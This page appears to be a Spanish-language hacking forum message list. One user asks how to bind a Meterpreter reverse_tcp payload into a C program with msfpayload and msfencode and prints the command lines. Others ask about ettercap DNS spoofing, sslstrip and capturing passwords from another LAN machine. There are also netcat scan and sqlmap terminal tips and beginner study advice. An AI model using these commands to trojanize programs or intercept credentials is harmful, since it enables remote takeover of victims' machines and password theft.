Mensajes

Hola.

Ultimamente he estado experimentando con msfpayload con eso de hacer payloads y tal. El caso es que me gustaría inyectar codigo de un payload en un programa. Espero que me podais ayudar. Por ejemplo, he probado esto:

Código [Seleccionar] Expandir


msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.0 LPORT=4444 R | msfencode -e (el encode que sea) -t exe -x programa.exe -k -o payload.exe

Siendo "programa.exe" un programa creado en C. Y no me funciona xd
También he probado cosas como:

Código [Seleccionar] Expandir


msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.0 LPORT=4444 R | msfencode -e (el encode que sea) -t c -x programa.exe -k -o hola.c

y vuelca en un fichero un codigo, que no se que hacer con él, ¿Me podríais ayudar?
Me gustaría saber como inyectar el payload en el programa en C.

claro que se puede, que quieres hacer? para que sacar google por facebook?, es obvio que algo haces mal... es simple y ademas hay otros factores a tomar en cuenta
si asi es tambien se puede, macchanger? bueno todo depende del SO ademas de la tool y otros factores, no se deja? algo sigues haciendo mal, tambien una IP asi que no se a donde vas con todo esto...
traducir? vamos que no entiendes entonces lo que se hace, repetimos algo haces mal, ademas claro de que cuando hablamos de sslstrip es el de mox no otro, si otros usan el modificado u hacen uso de un plugin eso es otra cosa pero en principio es lo mismo.
el brujo ya dio algunas, hay muchas apps y scripts ademas de analisis y pistas que nos dejan saber que alguien anda pastoreando nuestra pradera
naaaa que va, no es cuestion que no queramos decir o de dar formulas o el nombre del programa, estos estan en miles de tutoriales en la red, la cuestion es que aprendan y sino son cosa del monton, vamos que te falta regresa cuando entiendas que hacen cada cosa y por que pones cada byte en la shell, no es cuestion de poner puse LS y no se por que no me dio lo que quiero es cuestion de aprender, sino sigue en los tutos y suert.... ya tenemos bastante con gente mas avispada con malas intensiones teniendo que lidiar con ellos, no digo que seas  uno pero sino puedes armar estos muebles tu solo... no es que seas tonto es que no le has dado el suficiente interes... esperamos dudas fuertes, problemas mas profundos y no un: por que no puedo formatear e instalar?... y no queremos ver tus pasos 1 ,2,3,4.... eso no sirve sal del camino que vas perdido y suert ojala sea para aprender y no hacer el mal que de eso ya tenemos y mucho....

Gracias por responderme. Tienes razón, actúo antes de pensar. No es que solo siga tutoriales, tengo mucha literatura, pero claro, me siento un poco perdido porque no sé usar muy bien las herramientas. Pero bueno, iré poco a poco. Gracias por ayudarme jeje Simplemente quiero aprender a prevenir todos estos ataques porque me gustaría ser administrador de sistemas y en un futuro estudiar algo de esto.

Madre mia chico.. Este es el segundo post que haces preguntando lo mismo.. bueno más bien preguntando todo y esperando respuestas que es lo mas fácil..

En primer lugar, si aun no has encontrado ninguna respuesta a tus preguntas en google, es que realmente no estas preparado para hacer lo que quieres hacer.. eso para empezar.

Macchanger.. oyes disparos y no sabes donde. con ifconfig es posible cambiar una mac.
IP privada, eso no existe, pasa palabra. Aún así las IP son identificadores lógicos, puedes cambiarlas.

sslstrip no es un plugin es un programa, ettercap es de novatos.

Para evitar los ataques debes entenderlos, empieza por ahi

Tienes razon, pero te equivocas (en cierto modo) con SSLstrip. Ettercap añade un plugin que es SSLstrip que se supone que hace la misma funcion que el programa.
¿Y qué usan los profesionales para hacer MITM?

Hola, me gustaría saber si se puede prohibir el trafico a una pagina web con ettercap. ¿Como puedo redirigir el trafico para que vaya en vez de a google.com a bing.com? Lo he estado probando con ettercap y el plugin dns_spoof, haciendo que facebook.com tenga la IP de google.com, pero cuando pongo facebook, directamente no va ni la web.
Otra cosa, ¿se puede falsar una direccion MAC? He estado probando con macchanger, pero no me deja. Y ¿una direccion IP privada?
Y como puedo traducir de https a http. He probado a usar el plugin sslstrip de ettercap, pero no me funciona. También he probado a activar el programa en un puerto redirigiendo el trafico a ese puerto, pero no recibo nada.

Y la ultima de verdad xd ¿Como puedo prevenir y/o evitar estos ataques?
Gracias de antemano.

Hola, llevo toda la tarde probando ataques MitM con Ettercap, ARPspoofing, diftnet, etc... Y no se si lo hago mal o que. Primero quiero hacer un dns spoofing a un ordenador que tengo en red local con la IP 192.168.1.5, que no es maquina virtual, es PC. Y desde mi PC con Kali Linux intento usar ettercap para hacer este ataque y cambiar google.com por microsoft.com, pero no me lo permite, de hecho, si me conecto desde el PC atacante a google.com, me envia a microsoft.com.
A la hora de coger contraseñas lo mismo, intento entrar a algún sitio desde el ordenador victima y no me deja, pero intento entrar desde el mio propio y me detecta todas las contraseñas. ¿Por qué no se lo puedo hacer a otros ordenadores? ¿Me podríais echar una mano? Solo busco conocimiento, sed piadosos. Gracias.

Resulta que me he comprado un ordenador con una tarjeta grafica Intel HD Graphics 4400 y quiero ponerle memoria dedicada. Pero resulta que cuando voy a Resolucion de Pantalla>Configuracion avanzada. Y veo cuanta memoria dedicada tengo a video, me pone 0. Tengo Windows 8.1, ¿me podriais ayudar?

Hola, buenas!
Me interesa mucho el tema del hacking, me he estado empapando de información de diferentes páginas webs como http://www.hackerhighschool.org/lessons/lessons-es.html y un poco de programación gracias a http://www.codecademy.com/es/learn ( por cierto muy buenas) pero me encuentro en una encrucijada ya que no se por donde empezar. No pretendo aprender el truco de saber una contrseña de facebook, sino aprender algo con sentido y que tenga una teoría detrás. Si alguien me aporta alguna idea...
Me doy yo mismo la bienvenida al foro!
Gracias

Hola y bienvenido, espero que leas esto y no hayas abandonado el foro aún. Yo estoy escribiendo un manual sobre hacking y seguridad, y supongo que en una semana o menos lo publicaré en este foro, te voy a pasar parte del indice para que sepas por donde empezar.
Lo primero de todo sería conocer como se organiza internet y mas tarde los sistemas operativos.
TEMA 1: Introducción a internet
1.1: ¿Cómo funciona internet?
1.2: Direcciones IP
   1.2.1: Tipos de Redes
         1.2.2.1: LAN
         1.2.2.2: MAN
         1.2.2.3: WAN
1.3: Enrutamiento
1.4: Dominios
1.5: Protocolos
1.6: Arquitecturas de las redes
  1.6.1: Protección de la red
  1.6.2: Sistemas de prevención y detección

Disculpen, soy nuevo manejando este programa y la verdad tengo muchos problemas hasta para escanear mis puertos, se supone que debe de ser asi:
http://www.subirimagenes.net/i/13041408355243744.jpg
O mejor si me recomiendan un manual para asi aprenderlo desde lo mas basico, les agradeceria bastante.
Gracias.

No, no es así, veras... cuando tu pones nc.exe, después escribes la linea de codigo como si no hubieses ejecutado el programa. Cuando tú ejecutas el programa y éste te devuelve Cmd line: NO tienes que escribir "nc". Debes escribir directamente la linea de codigo. Te pongo un ejemplo:

Código [Seleccionar] Expandir


C:\>nc.exe
Cmd line: -v -w4 -z 192.168.1.1 21-445

Quedaría así, o directamente escribes:

Código [Seleccionar] Expandir


C:\>nc.exe -v -w4 -z 192.168.1.5 21-445

Espero haberte ayudado.

puedes hacer algo así

Código (bash) [Seleccionar] Expandir

gnome-terminal --command="bash -c 'sqlmap; read'"


el read lo que hace es dejar la pantalla abierta hasta que se presione algo

si quieres que quede para usar otro comando usa

Código (bash) [Seleccionar] Expandir

gnome-terminal --command="bash -c 'sqlmap; $SHELL'"


Gracias, el segundo me ha servido un monton, muchas gracias.

Estoy probando a abrir un terminal desde un script para ejecutar sqlmap. Utilizo "gnome-terminal -x sqlmap" y cuando se ejecuta sqlmap se cierra el terminal, ¿como hago para abrir otra shell con sqlmap directamente?